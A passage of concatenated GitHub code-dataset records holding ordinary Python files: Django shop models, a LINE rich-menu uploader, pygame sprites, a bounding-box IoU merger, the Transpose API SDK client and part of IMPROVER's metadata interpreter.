models.CharField(max_length=250, null=True, blank=True)\n about = models.TextField(blank=True, null=True)\n gender = models.CharField(max_length=250, default=\"Male\")\n address = models.CharField(max_length=250, null=True, blank=True)\n occupation = models.CharField(max_length=250, null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True, null=True)\n update_on = models.DateTimeField(auto_now=True, null=True)\n\n def __str__(self):\n return self.user.username\n\n\nclass add_product(models.Model):\n seller = models.ForeignKey(User, on_delete=models.CASCADE)\n product_name = models.CharField(max_length=250)\n product_category = models.ForeignKey(Category, on_delete=models.CASCADE)\n product_price = models.FloatField()\n sale_price = models.CharField(max_length=200)\n product_image = models.ImageField(upload_to=\"products/%Y/%m/%d\")\n details = models.TextField()\n qty = models.IntegerField(default=1)\n\n def __str__(self):\n return self.product_name\n\n\nclass cart(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(add_product, on_delete=models.CASCADE)\n quantity = models.IntegerField()\n status = models.BooleanField(default=False)\n added_on = models.DateTimeField(auto_now_add=True, null=True)\n update_on = models.DateTimeField(auto_now=True, null=True)\n\n def __str__(self):\n return self.user.username\n\n\nclass Order(models.Model):\n product = models.ForeignKey(add_product, on_delete=models.CASCADE,null=True)\n cust_id = models.ForeignKey(User, on_delete=models.CASCADE)\n cart_ids = models.CharField(max_length=250)\n product_ids = models.CharField(max_length=250)\n invoice_id = models.CharField(max_length=250)\n status = models.BooleanField(default=False)\n processed_on = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.cust_id.username\n\n\nclass 
balance(models.Model):\n    user = models.ForeignKey(User, on_delete=models.CASCADE)\n    balance = models.IntegerField(default=0)\n    wallet_balance = models.IntegerField(default=0)\n\n    def __str__(self):\n        return self.user.username\n\n\nclass wishlist(models.Model):\n    user = models.ForeignKey(User, on_delete=models.CASCADE)\n    product = models.ForeignKey(add_product, on_delete=models.CASCADE)\n\n\nclass Review(models.Model):\n    name = models.CharField(max_length=30, null=True)\n    contact = models.BigIntegerField(default=1, null=True)\n    product_id = models.ForeignKey(add_product, on_delete=models.CASCADE)\n    review = models.CharField(max_length=250)\n    time = models.DateTimeField(auto_now_add=True)\n\n    def __str__(self):\n        return self.product_id.product_name\n","repo_name":"Rishi-source/dvm","sub_path":"secondapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"1528204886","text":"import glob\nimport json\nfrom linebot import LineBotApi\nfrom linebot.models import RichMenu\n\nsecretFileContentJson = json.load(open(\"./line_secret_key\", \"r\", encoding=\"utf8\"))\n\n# load the security settings file\nchannel_access_token = secretFileContentJson.get(\"LINE_CHANNEL_ACCESS_TOKEN\")\n\nline_bot_api = LineBotApi(channel_access_token)\n\n# read the menu json/jpg files; the json files were designed with LINE Bot Designer\njson_path_list = glob.glob(r'.\\menu\\*.json')\njpg_path_list = glob.glob(r'.\\menu\\*.jpg')\n\n# confirm the file upload order\nprint(json_path_list)\nprint(jpg_path_list)\n\n# upload one set at a time\nfor index in range(len(json_path_list)):\n    print(f'上傳第 {index + 1} 組')\n    # create the rich menu and obtain its menuId\n    try:\n        lineRichMenuId = line_bot_api.create_rich_menu(rich_menu=RichMenu.new_from_json_dict(json.load(open(json_path_list[index], 'r', encoding='utf8'))))\n        print(lineRichMenuId)\n    except Exception:\n        print('建立 json 失敗')\n\n    # upload the image for that menu id\n    try:\n        with open(jpg_path_list[index], 'rb') as f:\n            set_image_response = line_bot_api.set_rich_menu_image(lineRichMenuId, 'image/jpeg', f)\n    except Exception:\n        print('上傳失敗')\n\nprint('上傳完成')","repo_name":"oange6214/Tibame_Projects","sub_path":"01_CV_Catus/catus-EfficientNet/rich_menu.py","file_name":"rich_menu.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"18875987918","text":"import codecs\nimport collections\nimport logging\nimport sys\nfrom threading import Thread, Lock\n\nclass View(object):\n\t_KILL_SEQ = codecs.encode(b\"\\xDC\\xCD\", \"hex\")\n\n\tdef __init__(self, params):\n\t\tself._is_thread_run = True\n\t\tself._input_thread = Thread(target = self._io_thread_main)\n\t\tself._input_queue = collections.deque()\n\t\tself._input_queue_mutex = Lock()\n\n\tdef run(self):\n\t\tself._input_thread.start()\n\n\tdef get_input(self):\n\t\tif not self._input_queue:\n\t\t\treturn None\n\n\t\tself._input_queue_mutex.acquire()\n\t\ttry:\n\t\t\ttext = self._input_queue.popleft()\n\t\tfinally:\n\t\t\tself._input_queue_mutex.release()\n\t\t\treturn text\n\n\tdef on_new_input(self):\n\t\tpass\n\n\tdef on_dismiss(self):\n\t\tpass\n\n\tdef join_io_thread(self):\n\t\tself._is_thread_run = False\n\t\tself._input_thread.join()\n\n\tdef is_test_input(self):\n\t\treturn False\n\n\tdef gen_test_input(self):\n\t\treturn None\n\n\tdef _io_thread_main(self):\n\t\twhile self._is_thread_run:\n\t\t\tif not self.is_test_input():\n\t\t\t\ttext = sys.stdin.readline()\n\t\t\telse:\n\t\t\t\tif \"test_gen\" not in locals():\n\t\t\t\t\ttest_gen =
self.gen_test_input()\n\t\t\t\ttext = next(test_gen)\n\n\t\t\tif not text:\n\t\t\t\tlogging.error(\"Failed while readline\")\n\t\t\t\tself.on_dismiss()\n\t\t\t\treturn\n\n\t\t\ttext = text[:-1]\n\t\t\tself._input_queue_mutex.acquire()\n\t\t\ttry:\n\t\t\t\tself._input_queue.append(text)\n\t\t\tfinally:\n\t\t\t\tself._input_queue_mutex.release()\n\t\t\tself.on_new_input()\n","repo_name":"hkust-smartcar/sc-studio","sub_path":"src/sc_studio/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5874499758","text":"import pygame\n\n\nclass Endzone(pygame.sprite.Sprite):\n \"\"\"Creates a transparent Rect Endzone Sprite at the given Position.\"\"\"\n\n def __init__(self, pos_x, pos_y):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([20, 20], pygame.SRCALPHA, 32)\n self.position_x = pos_x\n self.position_y = pos_y\n self.rect = self.image.get_rect()\n\n def draw(self, screen):\n screen.blit(self.image, (self.position_x, self.position_y))\n\n def update(self):\n self.rect.x = self.position_x\n self.rect.y = self.position_y\n\n def reached(self, player):\n \"\"\"Renders an the Image of the colliding Player instead of the transparent playholder rect.\n\n Gives the illusion the player is still standing in the endzone.\n \"\"\"\n\n self.image = player.image\n\n\nclass Endzones:\n \"\"\"Creates all needed Endzones and groups them for easy access.\"\"\"\n\n def __init__(self):\n self.ez1 = Endzone(243, 165)\n self.ez2 = Endzone(450, 165)\n self.ez3 = Endzone(630, 165)\n self.ez4 = Endzone(830, 165)\n self.ez5 = Endzone(1010, 165)\n self.group = pygame.sprite.Group()\n self.group.add(self.ez1, self.ez2, self.ez3, self.ez4, self.ez5)\n\n def check_for_reach(self, character, scorer):\n \"\"\"Checks if any of the endzones in the group collide with the given Character.\n\n Let the Character cheer if so\n and Renders the last Image of the Character\n and Updates the Scorer\n \"\"\"\n\n reached_endzone = pygame.sprite.spritecollideany(character, self.group)\n if reached_endzone:\n character.cheer()\n reached_endzone.reached(character)\n character.back_to_start()\n scorer.reached_goal()\n scorer.add_points(500)\n","repo_name":"Extraordinary-FH-Gaming-Collective/game","sub_path":"endzone.py","file_name":"endzone.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"20572608574","text":"import numpy as np\n\nfrom src.detect.utils import xyxy2xywh\n\nlow = np.s_[..., :2]\nhigh = np.s_[..., 2:]\n\n\ndef iou_matrix(A: np.ndarray, B: np.ndarray):\n # Based on code from\n # https://stackoverflow.com/questions/57897578/efficient-way-to-calculate-all-ious-of-two-lists\n A = A[:, None].copy()\n B = B[None].copy()\n intrs = (np.maximum(0, np.minimum(A[high], B[high])\n - np.maximum(A[low], B[low]))).prod(-1)\n return intrs / ((A[high]-A[low]).prod(-1)+(B[high]-B[low]).prod(-1)-intrs)\n\n\ndef merge_bboxes(A: np.ndarray, B: np.ndarray, threshold: float = 0.7)\\\n -> np.ndarray:\n \"\"\"Merge two sets of bboxes:\n\n 1. If there are bboxes in B with iou > threshould, the bboxes in A are\n replaced with corresponding bboxes from B.\n 2. 
If there are no corresponding bboxes in A, the bboxes from B are\n appended to A.\n\n Args:\n A (np.ndarray): A bboxes (N, P), where P >= 4 (x1, y1, x2, y2 and any\n extra values).\n B (np.ndarray): B bboxes (M, P).\n threshold (float, optional): IOU threshold, should be in [0.0..1.0].\n Defaults to 0.7.\n \"\"\"\n iou = iou_matrix(A[:, :4], B[:, :4])\n similar_mask = iou > threshold\n\n # Find the row indices in B and A where IOUs > threshold\n a_indices, b_indices = np.where(similar_mask)\n\n # Update the corresponding rows in A with the rows from B\n print('Replaced in A:', a_indices, '<-', b_indices)\n A[a_indices] = B[b_indices]\n\n # Find rows in B that have no similar bboxes in A by the IOU threshold\n unique_b_indices = np.setdiff1d(np.arange(len(B)), b_indices)\n print('Added from B:', unique_b_indices)\n A = np.vstack((A, B[unique_b_indices]))\n\n return A\n\n\nif __name__ == '__main__':\n A = np.array([[1, 1, 2, 2, 0.4],\n [1, 1, 4, 4, 0.4],\n [2, 2, 3, 4, 0.4]]).astype(float)\n B = np.array([[2, 2, 3, 3, 1.0],\n [2, 2, 3.1, 4, 1.0]]).astype(float)\n ious = iou_matrix(A[:, :4], B[:, :4])\n max_indices = np.argmax(ious, axis=1)\n max_iou = np.max(ious, axis=1)\n print(ious)\n print(merge_bboxes(A, B, 0.7))\n","repo_name":"AleksandrSim/strong_sort_yolox","sub_path":"src/tools/iou.py","file_name":"iou.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18001068259","text":"N,W=map(int,input().split())\ndp=[[-1]*301 for i in range(N+1)]\ndp[0][0]=0\n\nfor i in range(N):\n w,v=map(int,input().split())\n if i==0:\n base=w\n for i in range(N)[::-1]:\n for j in range(301)[::-1]:\n if dp[i][j]!=-1:\n dp[i+1][j+w-base]=max(dp[i][j]+v,dp[i+1][j+w-base])\n\nans=0\nfor index,item in enumerate(dp):\n if W-index*base+1<=0:\n break\n ans=max(max(item[:W-index*base+1]),ans)\n\nprint(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03732/s870619477.py","file_name":"s870619477.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"16757634505","text":"import time\nimport requests\n\nfrom ..src.util.models import *\n\nfrom ..src.util.errors import *\nfrom ..src.api.ens.base import ENS\nfrom ..src.api.nft.base import NFT\nfrom ..src.api.block.base import Block\nfrom ..src.api.token.base import Token\nfrom ..src.api.sql.base import SQL\nfrom ..src.api.endpoint.base import Endpoint\n\n# base class for the Transpose python SDK\nclass Transpose:\n def __init__(\n self,\n api_key: str,\n debug: bool=False,\n host: str=None,\n chain_id: int=0,\n chain: str=\"ethereum\",\n json: bool=False,\n ) -> None:\n\n self._next = None\n self._next_class_name = None\n self.host = host if host else 'https://api.transpose.io'\n self.verbose = debug\n self.json = json\n \n if chain.lower() == \"ethereum\": \n self.chain_id = 1\n \n if chain.lower() == \"polygon\": \n self.chain_id = 137\n \n if chain_id != 0:\n self.chain_id = chain_id\n\n # verifies that the API key is valid\n if self.perform_authorized_request(Block, 'https://api.transpose.io/v0/block/blocks-by-number?block_number_below=1', api_key):\n self.api_key = api_key\n \n # define the subclasses\n self.ens = ENS(self)\n self.nft = NFT(self)\n self.block = Block(self)\n self.token = Token(self)\n self.sql = SQL(self)\n self.endpoint = Endpoint(self)\n \n # deprecated in favor of the new API\n self.ENS = self.ens\n self.NFT = self.nft\n 
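# (added note) the capitalised attributes below are plain aliases of the lower-case clients above, kept so that older callers such as Transpose(...).NFT keep working\n        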
self.Block = self.block\n        self.Token = self.token\n    \n    def next(self) -> str:\n        return self.perform_authorized_request(self._next_class_name, self._next)\n    \n    def set_chain(self, chain_id: int=0, chain: str=\"ethereum\") -> None:\n        if chain.lower() == \"ethereum\": \n            self.chain_id = 1\n        \n        if chain.lower() == \"polygon\": \n            self.chain_id = 137\n        \n        if chain_id != 0:\n            self.chain_id = chain_id\n    \n    # this can be renamed later. Pagination helper function to get many \n    def bulk_request(self, endpoint_response: List, requests_per_second: int=None, results_to_fetch: int=999999999999) -> List:\n        api_response_data = endpoint_response\n        \n        while len(api_response_data) < results_to_fetch and self._next is not None:\n            \n            api_response_data += self.next()\n            \n            # if the user specified a requests per second, sleep for the appropriate amount of time\n            # has a 1% buffer.\n            if requests_per_second is not None:\n                time.sleep(1.01 / requests_per_second)\n        \n        return api_response_data[0:results_to_fetch]\n    \n    # the base function for performing authorized requests to the Transpose API suite\n    def perform_authorized_request(self, model: type, endpoint: str, api_key: str=None):\n        if endpoint is None: \n            return None\n        \n        # build the request\n        request_headers = {\n            'x-api-key': api_key if api_key else self.api_key,\n            'x-request-source': 'python-sdk',\n            'Accept': 'application/json',\n        }\n        \n        # add chain_id to the request\n        endpoint += f'&chain_id={self.chain_id}'\n        \n        # if in verbose mode, log the endpoint\n        print(\"\\n{}\\n  {}\\n\".format(endpoint.replace(\"https://api.transpose.io\", self.host).split(\"?\")[0], \"\\n  \".join(endpoint.split(\"?\")[1].split(\"&\")))) if self.verbose else None\n        request = requests.get(endpoint.replace(\"https://api.transpose.io\", self.host), headers=request_headers)\n        \n        # check for a successful response\n        if request.status_code == 200:\n            \n            response = request.json()\n            \n            # If the response contains a paginator, set the paginator's next endpoint\n            if 'next' in response:\n                if response['next'] is None:\n                    self._next = None\n                    self._next_class_name = None\n                else: \n                    self._next = response['next']\n                    self._next_class_name = model\n            \n            # if we are 
in json mode, return the raw json\n if self.json:\n return response\n\n return list(model(dict(each)) for each in response['results'])\n else:\n raise_custom_error(request.status_code, request.json()['message'])","repo_name":"TransposeData/transpose-python-sdk","sub_path":"transpose/src/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"90"} +{"seq_id":"18012371639","text":"N, A, B = map(int, input().split())\nitems = list(map(int, input().split()))\n\nitems.sort(reverse=True)\n\nmaxAvg = sum(items[:A]) / A\n\nprint(maxAvg)\n\nfact = [1 for _ in range(N + 10)]\n\nfor i in range(1, N + 10):\n fact[i] = (fact[i - 1] * i)\n\ndef comb(n, r):\n if 0 < r < n:\n return fact[n] // fact[r] // fact[n - r]\n if r == 0 or r == n:\n return 1\n return 0\n\n\nif items[0] == items[A - 1]:\n right = A - 1\n while right < N and items[right] == items[0]:\n right += 1\n ans = 0\n for take in range(A, B + 1):\n ans += comb(right, take)\n print(ans)\nelse:\n left = A - 1\n while left >= 0 and items[left] == items[A - 1]:\n left -= 1\n right = A - 1\n while right < N and items[right] == items[A - 1]:\n right += 1\n ans = comb(right - left - 1, A - left - 1)\n print(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03776/s873575606.py","file_name":"s873575606.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"14064320511","text":"import re\nfrom typing import Callable, Dict, Iterable, List\n\nfrom iris.coords import CellMethod, Coord\nfrom iris.cube import Cube\nfrom iris.exceptions import CoordinateNotFoundError\n\nfrom improver.metadata.check_datatypes import check_mandatory_standards\nfrom improver.metadata.constants import PERC_COORD\nfrom improver.metadata.constants.attributes import MANDATORY_ATTRIBUTES\nfrom improver.metadata.probabilistic import (\n find_percentile_coordinate,\n find_threshold_coordinate,\n get_threshold_coord_name_from_probability_name,\n)\nfrom improver.utilities.cube_manipulation import get_coord_names\n\n# Constants relating to metadata encoding\n\n# Model name-to-attribute maps\nMODEL_CODES = {\n \"Nowcast\": \"nc_det\",\n \"Global\": \"gl_det\",\n \"MOGREPS-G\": \"gl_ens\",\n \"MOGREPS-UK\": \"uk_ens\",\n \"UKV\": \"uk_det\",\n}\nMODEL_NAMES = dict((v, k) for k, v in MODEL_CODES.items())\n\n# Diagnostics that differ from the PROB / PERC / DIAG pattern (not all are handled)\nANCILLARIES = [\n \"surface_altitude\",\n \"land_fraction\",\n \"land_binary_mask\",\n \"grid_with_halo\",\n \"topographic_zone_weights\",\n \"topography_mask\",\n \"silhouette_roughness\",\n \"standard_deviation_of_height_in_grid_cell\",\n \"smoothing_coefficient_x\",\n \"smoothing_coefficient_y\",\n \"linke_turbidity\",\n]\nEMOS_COEFF_NAMES = [\n f\"emos_coefficient_{coeff}\" for coeff in [\"alpha\", \"beta\", \"gamma\", \"delta\"]\n]\nINTERMEDIATES = [\n \"grid_neighbours\",\n \"grid_eastward_wind\",\n \"grid_northward_wind\",\n \"precipitation_advection_x_velocity\",\n \"precipitation_advection_y_velocity\",\n \"reliability_calibration_table\",\n] + EMOS_COEFF_NAMES\n\nSPECIAL_CASES = [\"weather_code\", \"wind_from_direction\"] + INTERMEDIATES + ANCILLARIES\n\n# Expected coordinates for different field types\nSPOT_COORDS = [\"spot_index\", \"latitude\", \"longitude\", \"altitude\", \"wmo_id\"]\nUNBLENDED_TIME_COORDS = [\"time\", \"forecast_period\", 
\"forecast_reference_time\"]\nBLENDED_TIME_COORDS = [\"time\", \"blend_time\"]\n\n# Compliant, required and forbidden cell methods\nNONCOMP_CMS = [\n CellMethod(method=\"mean\", coords=\"forecast_reference_time\"),\n CellMethod(method=\"mean\", coords=\"model_id\"),\n CellMethod(method=\"mean\", coords=\"model_configuration\"),\n CellMethod(method=\"mean\", coords=\"realization\"),\n]\nNONCOMP_CM_METHODS = [\"point\", \"weighted_mean\"]\nCOMPLIANT_CM_METHODS = [\"min\", \"max\", \"minimum\", \"maximum\", \"sum\"]\nPRECIP_ACCUM_CM = CellMethod(method=\"sum\", coords=\"time\")\nPRECIP_ACCUM_NAMES = [\n \"lwe_thickness_of_precipitation_amount\",\n \"lwe_thickness_of_sleetfall_amount\",\n \"lwe_thickness_of_snowfall_amount\",\n \"thickness_of_rainfall_amount\",\n]\nWXCODE_MODE_CM = lambda hour: CellMethod(\n method=\"mode\", coords=\"time\", intervals=f\"{hour} hour\"\n)\nWXCODE_NAMES = [\"weather_code\"]\n\n# Compliant, required and forbidden attributes\nNONCOMP_ATTRS = [\n \"mosg__grid_type\",\n \"mosg__grid_domain\",\n \"mosg__grid_version\",\n \"mosg__forecast_run_duration\",\n \"grid_id\",\n \"source_realizations\",\n \"um_version\",\n]\nDIAG_ATTRS = {\n \"weather_code\": [\"weather_code\", \"weather_code_meaning\"],\n \"wind_gust\": [\"wind_gust_diagnostic\"],\n}\nCOMPLIANT_ATTRS = MANDATORY_ATTRIBUTES + [\n \"Conventions\",\n \"least_significant_digit\",\n \"mosg__model_configuration\",\n \"mosg__model_run\",\n]\n\n# Expected substrings to be found in certain title attributes\nBLEND_TITLE_SUBSTR = \"IMPROVER Post-Processed Multi-Model Blend\"\nPP_TITLE_SUBSTR = \"Post-Processed\"\nSPOT_TITLE_SUBSTR = \"Spot Values\"\n\n\nclass MOMetadataInterpreter:\n \"\"\"Class to interpret an iris cube according to the Met Office specific\n IMPROVER standard. 
This is intended as a debugging tool to aid developers\n in adding and modifying metadata within the code base.\"\"\"\n\n PROB = \"probabilities\"\n PERC = \"percentiles\"\n DIAG = \"realizations\"\n ANCIL = \"ancillary\"\n\n def __init__(self) -> None:\n \"\"\"Initialise class parameters, which store information about a cube to be\n parsed into a human-readable string by the\n :func:`~improver.developer_tools.metadata_interpreter.display_interpretation`\n function.\n \"\"\"\n self.model_id_attr = \"mosg__model_configuration\"\n self.record_run_attr = \"mosg__model_run\"\n self.unhandled = False\n\n # set up empty strings to record any non-compliance (returned as one error\n # after all checks have been made) or warnings\n self.errors = []\n self.warnings = []\n # initialise information to be derived from input cube\n self.prod_type = \"gridded\" # gridded or spot\n self.field_type = (\n None # probabilities, percentiles, realizations, ancillary or name\n )\n self.diagnostic = None # name\n self.relative_to_threshold = None # for probability data only\n self.methods = \"\" # human-readable interpretation of cell method(s)\n self.post_processed = (\n None # True / False on whether significant processing applied\n )\n self.model = None # human-readable model name\n self.blended = None # has it been model blended (True / False)\n\n def check_probability_cube_metadata(self, cube: Cube) -> None:\n \"\"\"Checks probability-specific metadata\"\"\"\n if cube.units != \"1\":\n self.errors.append(\n f\"Expected units of 1 on probability data, got {cube.units}\"\n )\n\n try:\n self.diagnostic = get_threshold_coord_name_from_probability_name(\n cube.name()\n )\n except ValueError as cause:\n # if the probability name is not valid\n self.errors.append(str(cause))\n return\n\n expected_threshold_name = self.diagnostic\n\n if not cube.coords(expected_threshold_name):\n msg = f\"Cube does not have expected threshold coord '{expected_threshold_name}'; \"\n try:\n threshold_name = find_threshold_coordinate(cube).name()\n except CoordinateNotFoundError:\n coords = [coord.name() for coord in cube.coords()]\n msg += (\n f\"no coord with var_name='threshold' found in all coords: {coords}\"\n )\n self.errors.append(msg)\n else:\n msg += f\"threshold coord has incorrect name '{threshold_name}'\"\n self.errors.append(msg)\n self.check_threshold_coordinate_properties(\n cube.name(), cube.coord(threshold_name)\n )\n else:\n threshold_coord = cube.coord(expected_threshold_name)\n self.check_threshold_coordinate_properties(cube.name(), threshold_coord)\n\n def check_threshold_coordinate_properties(\n self, cube_name: str, threshold_coord: Coord\n ) -> None:\n \"\"\"Checks threshold coordinate properties are correct and consistent with\n cube name\"\"\"\n if threshold_coord.var_name != \"threshold\":\n self.errors.append(\n f\"Threshold coord {threshold_coord.name()} does not have \"\n \"var_name='threshold'\"\n )\n\n try:\n self.relative_to_threshold = threshold_coord.attributes[\n \"spp__relative_to_threshold\"\n ]\n except KeyError:\n self.errors.append(\n f\"{cube_name} threshold coordinate has no \"\n \"spp__relative_to_threshold attribute\"\n )\n return\n\n if self.relative_to_threshold in (\"greater_than\", \"greater_than_or_equal_to\"):\n threshold_attribute = \"above\"\n elif self.relative_to_threshold in (\"less_than\", \"less_than_or_equal_to\"):\n threshold_attribute = \"below\"\n elif self.relative_to_threshold == \"between_thresholds\":\n # TODO remove this once we get rid of the \"between thresholds\" 
plugin and CLI\n threshold_attribute = \"between\"\n self.warnings.append(\"Between thresholds data are not fully supported\")\n else:\n threshold_attribute = None\n self.errors.append(\n f\"spp__relative_to_threshold attribute '{self.relative_to_threshold}' \"\n \"is not in permitted value set\"\n )\n\n if threshold_attribute and threshold_attribute not in cube_name:\n self.errors.append(\n f\"Cube name '{cube_name}' is not consistent with \"\n f\"spp__relative_to_threshold attribute '{self.relative_to_threshold}'\"\n )\n\n def check_cell_methods(self, cube: Cube) -> None:\n \"\"\"Checks cell methods are permitted and correct\"\"\"\n if any([substr in cube.name() for substr in PRECIP_ACCUM_NAMES]):\n msg = f\"Expected sum over time cell method for {cube.name()}\"\n if not cube.cell_methods:\n self.errors.append(msg)\n else:\n found_cm = False\n for cm in cube.cell_methods:\n if (\n cm.method == PRECIP_ACCUM_CM.method\n and cm.coord_names == PRECIP_ACCUM_CM.coord_names\n ):\n found_cm = True\n if not found_cm:\n self.errors.append(msg)\n\n for cm in cube.cell_methods:\n if cm.method in COMPLIANT_CM_METHODS:\n self.methods += f\" {cm.method} over {cm.coord_names[0]}\"\n if self.field_type == self.PROB:\n cm_options = [\n f\"of {self.diagnostic}\",\n f\"of {self.diagnostic} over .* within time window\",\n ]\n if not cm.comments or not any(\n [re.match(cmo, cm.comments[0]) for cmo in cm_options]\n ):\n self.errors.append(\n f\"Cell method {cm} on probability data should have comment \"\n f\"'of {self.diagnostic}'\"\n )\n # check point and bounds on method coordinate\n if \"time\" in cm.coord_names:\n if cube.coord(\"time\").bounds is None:\n self.errors.append(f\"Cube of{self.methods} has no time bounds\")\n\n elif cm in NONCOMP_CMS or cm.method in NONCOMP_CM_METHODS:\n self.errors.append(f\"Non-standard cell method {cm}\")\n else:\n # flag method which might be invalid, but we can't be sure\n self.warnings.append(\n f\"Unexpected cell method {cm}. 
Please check the standard to \"\n \"ensure this is valid\"\n )\n\n def _check_blend_and_model_attributes(self, attrs: Dict) -> None:\n \"\"\"Interprets attributes for model and blending information\n and checks for self-consistency\"\"\"\n self.blended = True if BLEND_TITLE_SUBSTR in attrs[\"title\"] else False\n\n if self.blended:\n complete_blend_attributes = True\n if self.model_id_attr not in attrs:\n self.errors.append(f\"No {self.model_id_attr} on blended file\")\n complete_blend_attributes = False\n if self.record_run_attr not in attrs:\n self.errors.append(f\"No {self.record_run_attr} on blended file\")\n complete_blend_attributes = False\n\n if complete_blend_attributes:\n codes = attrs[self.model_id_attr].split(\" \")\n names = []\n cycles = {\n k: v\n for k, v in [\n item.split(\":\")[0:-1]\n for item in attrs[self.record_run_attr].split(\"\\n\")\n ]\n }\n\n for code in codes:\n try:\n names.append(MODEL_NAMES[code])\n except KeyError:\n self.errors.append(\n f\"Model ID attribute contains unrecognised model code {code}\"\n )\n else:\n names[-1] += f\" (cycle: {cycles[code]})\"\n self.model = \", \".join(names)\n\n return\n\n if self.model_id_attr in attrs:\n for key in MODEL_CODES:\n if (\n f\"{key} Model\" in attrs[\"title\"]\n and attrs[self.model_id_attr] != MODEL_CODES[key]\n ):\n self.errors.append(\n f\"Title {attrs['title']} is inconsistent with model ID \"\n f\"attribute {attrs[self.model_id_attr]}\"\n )\n\n try:\n self.model = MODEL_NAMES[attrs[self.model_id_attr]]\n except KeyError:\n self.errors.append(\n f\"Attribute {attrs[self.model_id_attr]} is not a valid single \"\n \"model. If valid for blend, then title attribute is missing \"\n f\"expected substring {BLEND_TITLE_SUBSTR}.\"\n )\n\n def check_attributes(self, attrs: Dict) -> None:\n \"\"\"Checks for unexpected attributes, then interprets values for model\n information and checks for self-consistency\"\"\"\n if self.diagnostic in DIAG_ATTRS:\n permitted_attributes = COMPLIANT_ATTRS + DIAG_ATTRS[self.diagnostic]\n else:\n permitted_attributes = COMPLIANT_ATTRS.copy()\n\n if any([attr in NONCOMP_ATTRS for attr in attrs]):\n self.errors.append(\n f\"Attributes {attrs.keys()} include one or more forbidden \"\n f\"values {[attr for attr in attrs if attr in NONCOMP_ATTRS]}\"\n )\n elif any([attr not in permitted_attributes for attr in attrs]):\n self.warnings.append(\n f\"{attrs.keys()} include unexpected attributes \"\n f\"{[attr for attr in attrs if attr not in permitted_attributes]}. 
\"\n \"Please check the standard to ensure this is valid.\"\n )\n\n if self.diagnostic in DIAG_ATTRS:\n required = DIAG_ATTRS[self.diagnostic]\n if any([req not in attrs for req in required]):\n self.errors.append(\n f\"Attributes {attrs.keys()} missing one or more required \"\n f\"values {[req for req in required if req not in attrs]}\"\n )\n\n if self.field_type != self.ANCIL:\n if not all([attr in attrs for attr in MANDATORY_ATTRIBUTES]):\n self.errors.append(\n f\"Attributes {attrs.keys()} missing one or more mandatory values \"\n f\"{[req for req in MANDATORY_ATTRIBUTES if req not in attrs]}\"\n )\n\n if \"title\" in attrs:\n self.post_processed = (\n True\n if PP_TITLE_SUBSTR in attrs[\"title\"]\n or BLEND_TITLE_SUBSTR in attrs[\"title\"]\n else False\n )\n # determination of whether file is blended depends on title\n self._check_blend_and_model_attributes(attrs)\n\n def _check_coords_present(\n self, coords: List[str], expected_coords: Iterable[str]\n ) -> None:\n \"\"\"Check whether all expected coordinates are present\"\"\"\n found_coords = [coord for coord in coords if coord in expected_coords]\n if not set(found_coords) == set(expected_coords):\n self.errors.append(\n f\"Missing one or more coordinates: found {found_coords}, \"\n f\"expected {expected_coords}\"\n )\n\n def _check_coords_are_horizontal(self, cube: Cube, coords: List[str]) -> None:\n \"\"\"Checks that all the mentioned coords share the same dimensions as the x and y coords\"\"\"\n y_coord, x_coord = (cube.coord(axis=n) for n in \"yx\")\n horizontal_dims = set([cube.coord_dims(n)[0] for n in [y_coord, x_coord]])\n for coord in coords:\n try:\n coord_dims = set(cube.coord_dims(coord))\n except CoordinateNotFoundError:\n # The presence of coords is checked elsewhere\n continue\n if coord_dims != horizontal_dims:\n self.errors.append(\n f\"Coordinate {coord} does not span all horizontal coordinates\"\n )\n\n def _check_coord_bounds(self, cube: Cube, coord: str) -> None:\n \"\"\"If coordinate has bounds, check points are equal to upper bound\"\"\"\n if cube.coord(coord).bounds is not None:\n upper_bounds = cube.coord(coord).bounds[..., 1]\n if not (cube.coord(coord).points == upper_bounds).all():\n self.errors.append(f\"{coord} points should be equal to upper bounds\")\n\n def check_spot_data(self, cube: Cube, coords: List[str]) -> None:\n \"\"\"Check spot coordinates\"\"\"\n self.prod_type = \"spot\"\n if \"title\" in cube.attributes:\n if SPOT_TITLE_SUBSTR not in cube.attributes[\"title\"]:\n self.errors.append(\n f\"Title attribute {cube.attributes['title']} is not \"\n \"consistent with spot data\"\n )\n\n self._check_coords_present(coords, SPOT_COORDS)\n self._check_coords_are_horizontal(cube, SPOT_COORDS)\n\n def run(self, cube: Cube) -> None:\n \"\"\"Populates self-consistent interpreted parameters, or raises collated errors\n describing (as far as posible) how the metadata are a) not self-consistent,\n and / or b) not consistent with the Met Office IMPROVER standard.\n\n Although every effort has been made to return as much information as possible,\n collated errors may not be complete if the issue is fundamental. 
